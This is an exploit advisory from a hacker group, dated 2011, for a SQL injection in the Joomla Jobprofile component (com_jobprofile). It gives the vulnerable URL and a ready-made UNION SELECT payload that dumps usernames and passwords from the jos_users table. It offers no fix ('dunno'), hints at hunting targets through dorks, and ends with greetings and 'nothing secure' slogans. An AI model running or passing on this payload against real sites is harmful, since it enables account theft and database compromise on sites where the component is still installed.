44 lines
No EOL
1.5 KiB
Text
44 lines
No EOL
1.5 KiB
Text
[~] Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability
|
||
[~] Author : kaMtiEz (kamtiez@exploit-id.com)
|
||
[~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id
|
||
[~] Date : 2 Dec , 2011
|
||
|
||
[ Software Information ]
|
||
|
||
[+] Vendor : http://www.thakkertech.com/
|
||
[+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924
|
||
[+] Download : http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html
|
||
[+] Version : null / 1.0 maybe :D
|
||
[+] Price : 25,00
|
||
[+] Vulnerability : SQL INJECTION
|
||
[+] Dork : "think it :D"
|
||
[+] LOCATION : INDONESIA -
|
||
|
||
[ Vulnerable File ]
|
||
|
||
http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL]
|
||
|
||
[ XpL ]
|
||
|
||
http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--
|
||
|
||
[ FIX ]
|
||
|
||
dunno :">
|
||
|
||
[ Thx TO ]
|
||
|
||
[+] INDONESIANCODER EXPLOIT-ID MAGELANGCYBER TEAM MALANGCYBER CREW KILL-9
|
||
[+] Tukulesto,arianom,el-farhatz,Jundab,ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa,t3ll0
|
||
[+] f4ckMen,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpret0,Dr.Cruzz
|
||
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo,zaenal,gepenk ~ etc etc
|
||
|
||
[ NOTE ]
|
||
|
||
[+] let it be ..
|
||
[+] be yourself ;)
|
||
|
||
[ QUOTE ]
|
||
|
||
[+] INDONESIANCODER still r0x
|
||
[+] nothing secure .. |